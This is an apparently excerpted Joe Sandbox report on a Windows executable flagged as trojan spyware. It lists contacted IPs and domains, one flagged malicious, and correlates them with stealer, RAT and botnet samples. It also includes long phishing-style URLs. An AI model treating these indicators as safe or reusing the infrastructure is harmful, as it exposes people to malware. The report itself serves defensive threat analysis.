http://anglebug.com/4836	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/presentation/:	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4384	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/3m	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/Tn	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3970	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000015.00000003.2475233569.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474589487.0000377800F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474071772.0000377800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475485638.0000377800F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474388287.000037780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474700421.0000377801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475346645.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475306740.0000377800A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474451664.000037780105C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://labs.google.com/search?source=ntp	chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/#o	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7604	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/hj	chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7761	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/app/so?eom=1	chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7760	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	JWBIEC.16.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp, J5PP8Q.16.dr	false	high
https://google-ohttp-relay-join.fastly-edge.com/Gn	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5901	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3965	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6439	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7406	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/search	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7161	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-autopush.corp.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/search?q=$	chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7162	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5906	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.101.153.57	stadyready.su	Russian Federation	198610	BEGET-ASRU	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
159.69.102.165	kresk.lol	Germany	24940	HETZNER-ASDE	true
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568173
Start date and time:	2024-12-04 12:15:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xoJxSAotVM.exe renamed because original name is a hash value
Original Sample Name:	135436f1ae4e69f5098f8e74e3106863.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@48/41@7/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 53 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 172.217.19.227, 172.217.19.238, 74.125.205.84, 172.217.17.46, 23.218.208.109, 172.217.21.35
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: xoJxSAotVM.exe

Simulations

Behavior and APIs

Time	Type	Description
06:15:59	API Interceptor	19x Sleep call for process: powershell.exe modified
06:16:06	API Interceptor	1x Sleep call for process: din.exe modified
06:16:47	API Interceptor	18x Sleep call for process: Decade.com modified
06:17:17	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=oSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DoSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ%22%7D%7D&flowContextData=RDl_AZcF1sl5Rb_6LCOad8Ablnu-W7AxB_i5FzkmY9ljbd6ElIlIteG0y31awgymrSFY-NEhR9oodKgi2Jr_54nHRHUI22A5btXBAz58pUBlVy_icxhdiCyvbxtKkJbyvPwAFXZm9Hu-TuP8fUbi3kD9SI3uQE-nXU-1T6hk9yNEcfLwmQ9q2oXw0Nu89DKUwRZZ-hEgdjZhl4tqKDQiASbkdXigxUyjHWAPt-vOaJzbzisp0scQXF4UF-J1Rto6RYCxskkLambqbUPNkjVq_ZtnTRrfcOFs6AdzgjQZxFjLXCq1M3EW1Aiq9DSZcmtteoSiOkL-Yl_4s2YOFo6jNRRQrcEHNylGYTBCyHc65n4_85NWbx-ikEWoVlI4LXcJW4dftTovp8EWo5xXhEORiceFOjZRVbk5MVtSKHu91b7gPLC3F3USPVAc68XpKKXL_xvsUAp1wPS1patgsMBTMQo3Gwa68P9HfAfTWEjlQ1Yf3yTIWtRpNF8qyyGgAUBLgrJVAT_OmXFJJrX08CV-vxGPkepVr0r1FVRxwTmimvKh55xYEKkfPK5XJKmenbfgUa9CbfH9d_FpW5yVigO-oMpueUaWL8bSCYMeFYr8B1GfpUn9ASsdqnfnFqtpUGY0Y4MI9f0bvAFH6gYvW7ZTeYh_jKu&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=c038b022-b182-11ef-83cc-0118134ab4bf&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=c038b022-b182-11ef-83cc-0118134ab4bf&calc=f826437c02759&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signin	Get hash	malicious	Unknown	Browse
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	Contract Proposal Documents.pdf	Get hash	malicious	Unknown	Browse
	https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3D	Get hash	malicious	Unknown	Browse
	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse
	https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
159.69.102.165	ton.exe	Get hash	malicious	Vidar	Browse
159.69.102.165	ton.exe	Get hash	malicious	Vidar	Browse
5.101.153.57	KnqEVjjApt.exe	Get hash	malicious	DCRat	Browse
	02iEELiLVH.exe	Get hash	malicious	DCRat	Browse
	QIKiV83Pkl.exe	Get hash	malicious	DCRat	Browse
	yx18iwwPFF.exe	Get hash	malicious	DCRat	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://cocain.vip/	Get hash	malicious	Unknown	Browse	149.154.167.99
	TikTokDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	TT18.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	pyjnkasedf.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
kresk.lol	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165
kresk.lol	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	PAYMENT RECEIPT_pdf.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi _PDF_.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3GloGaDtsG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	K1_Chit_Form.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
BEGET-ASRU	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.155.118.34
	splppc.elf	Get hash	malicious	Unknown	Browse	81.200.117.158
	arm5.elf	Get hash	malicious	Unknown	Browse	193.168.46.153
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	87.236.16.19
	GNUCXbYadp.exe	Get hash	malicious	DCRat	Browse	5.101.153.48
	t8xf0Y1ovi.exe	Get hash	malicious	DCRat	Browse	185.50.25.59
	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	5.101.153.173
	file.exe	Get hash	malicious	Amadey, Xmrig	Browse	87.236.16.19
	file.exe	Get hash	malicious	Xmrig	Browse	87.236.16.19
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	87.236.16.19
HETZNER-ASDE	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165
	ton.exe	Get hash	malicious	Vidar	Browse	159.69.102.165
	x86.elf	Get hash	malicious	Mirai	Browse	144.79.65.48
	teste.x86.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	128.140.75.208
	m-i.p-s.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165
	x-8.6-.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165
	a-r.m-5.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165
	s-h.4-.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165
	p-p.c-.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165
	m-p.s-l.Logicnet.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.201.59.165

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=oSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DoSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ%22%7D%7D&flowContextData=RDl_AZcF1sl5Rb_6LCOad8Ablnu-W7AxB_i5FzkmY9ljbd6ElIlIteG0y31awgymrSFY-NEhR9oodKgi2Jr_54nHRHUI22A5btXBAz58pUBlVy_icxhdiCyvbxtKkJbyvPwAFXZm9Hu-TuP8fUbi3kD9SI3uQE-nXU-1T6hk9yNEcfLwmQ9q2oXw0Nu89DKUwRZZ-hEgdjZhl4tqKDQiASbkdXigxUyjHWAPt-vOaJzbzisp0scQXF4UF-J1Rto6RYCxskkLambqbUPNkjVq_ZtnTRrfcOFs6AdzgjQZxFjLXCq1M3EW1Aiq9DSZcmtteoSiOkL-Yl_4s2YOFo6jNRRQrcEHNylGYTBCyHc65n4_85NWbx-ikEWoVlI4LXcJW4dftTovp8EWo5xXhEORiceFOjZRVbk5MVtSKHu91b7gPLC3F3USPVAc68XpKKXL_xvsUAp1wPS1patgsMBTMQo3Gwa68P9HfAfTWEjlQ1Yf3yTIWtRpNF8qyyGgAUBLgrJVAT_OmXFJJrX08CV-vxGPkepVr0r1FVRxwTmimvKh55xYEKkfPK5XJKmenbfgUa9CbfH9d_FpW5yVigO-oMpueUaWL8bSCYMeFYr8B1GfpUn9ASsdqnfnFqtpUGY0Y4MI9f0bvAFH6gYvW7ZTeYh_jKu&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=c038b022-b182-11ef-83cc-0118134ab4bf&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=c038b022-b182-11ef-83cc-0118134ab4bf&calc=f826437c02759&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signin	Get hash	malicious	Unknown	Browse	172.202.163.200 13.107.246.63
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse	172.202.163.200 13.107.246.63
	Contract Proposal Documents.pdf	Get hash	malicious	Unknown	Browse	172.202.163.200 13.107.246.63
	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	172.202.163.200 13.107.246.63
